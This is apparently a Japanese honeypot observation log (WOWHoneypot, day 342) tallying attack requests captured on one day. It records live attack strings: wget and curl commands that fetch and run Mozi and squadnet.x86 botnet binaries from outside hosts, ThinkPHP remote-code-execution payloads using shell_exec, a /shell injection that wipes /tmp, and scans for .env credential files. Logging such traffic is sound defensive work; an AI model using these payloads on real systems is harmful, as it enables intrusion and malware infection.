WOWHoneypot観察(342日目)
2020/02/23(日)
トータルは件でした。
ハンティングログは以下です。
79.101.58[.]26 wget+hxxp[:]//192.168.1[.]1:8088/Mozi.m |
64.94.212[.]197 wget hxxp[:]//192.223.26[.]139/squadnet.x86 |
64.94.212[.]197 curl -O hxxp[:]//192.223.26[.]139/squadnet.x86 |
42.228.102[.]190 wget+hxxp[:]//182.113.208[.]106:38220/Mozi.a |
件数 | 概要 | リクエスト |
---|---|---|
36 | アクセス | GET / |
21 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
21 | 調査 | GET /is_test |
2 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
1 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
1 | Gponルータの脆弱性を狙った通信 | POST /GponForm/diag_Form?images/ |
1 | 不正中継の調査 | HEAD hxxp[:]//112.124.42.80:63435/ |
1 | 環境設定調査 | GET /~dev/.env |
1 | 環境設定調査 | GET /web/.env |
1 | 環境設定調査 | GET /vod_installer/.env |
1 | 環境設定調査 | GET /travis/.env |
1 | 環境設定調査 | GET /system/.env |
1 | 環境設定調査 | GET /src/.env |
1 | 環境設定調査 | GET /sources/.env |
1 | 環境設定調査 | GET /site/.env |
1 | 環境設定調査 | GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//182.113.208.106:38220/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws |
1 | 環境設定調査 | GET /shared/.env |
1 | 環境設定調査 | GET /server/.env |
1 | 環境設定調査 | GET /search/.env |
1 | 環境設定調査 | GET /scripts/.env |
1 | 環境設定調査 | GET /routes/.env |
1 | 環境設定調査 | GET /rest/.env |
1 | 環境設定調査 | GET /react/.env |
1 | ThinkPHPの脆弱性を狙った通信 | GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20hxxp[:]//192.223.26.139/squadnet.x86;cat%20squadnet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp |
1 | ThinkPHPの脆弱性を狙った通信 | GET /public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;curl%20-O%20hxxp[:]//192.223.26.139/squadnet.x86;cat%20squadnet.x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp |
1 | 環境設定調査 | GET /protected/.env |
1 | 環境設定調査 | GET /project/.env |
1 | 環境設定調査 | GET /private/.env |
1 | 環境設定調査 | GET /personal/.env |
1 | 環境設定調査 | GET /mods/.env |
1 | 環境設定調査 | GET /master/.env |
1 | 環境設定調査 | GET /login/.env |
1 | 環境設定調査 | GET /local/.env |
1 | 環境設定調査 | GET /laravel/.env |
1 | 環境設定調査 | GET /laravel-artisan/.env |
1 | 環境設定調査 | GET /inc/.env |
1 | 環境設定調査 | GET /frontend/.env |
1 | アクセス | GET /favicon.ico |
1 | 環境設定調査 | GET /engine/.env |
1 | 環境設定調査 | GET /docker/.env |
1 | 環境設定調査 | GET /development/.env |
1 | 環境設定調査 | GET /dev/.env |
1 | 環境設定調査 | GET /cron/.env |
1 | 環境設定調査 | GET /cp/.env |
1 | 環境設定調査 | GET /core/.env |
1 | 環境設定調査 | GET /config/.env |
1 | 環境設定調査 | GET /backend/.env |
1 | 環境設定調査 | GET /back/.env |
1 | 環境設定調査 | GET /auth/.env |
1 | 環境設定調査 | GET /apps/.env |
1 | 環境設定調査 | GET /application/.env |
1 | 環境設定調査 | GET /app/.env |
1 | 環境設定調査 | GET /api/.env |
1 | 環境設定調査 | GET /admin/.env |
1 | 環境設定調査 | GET /.env |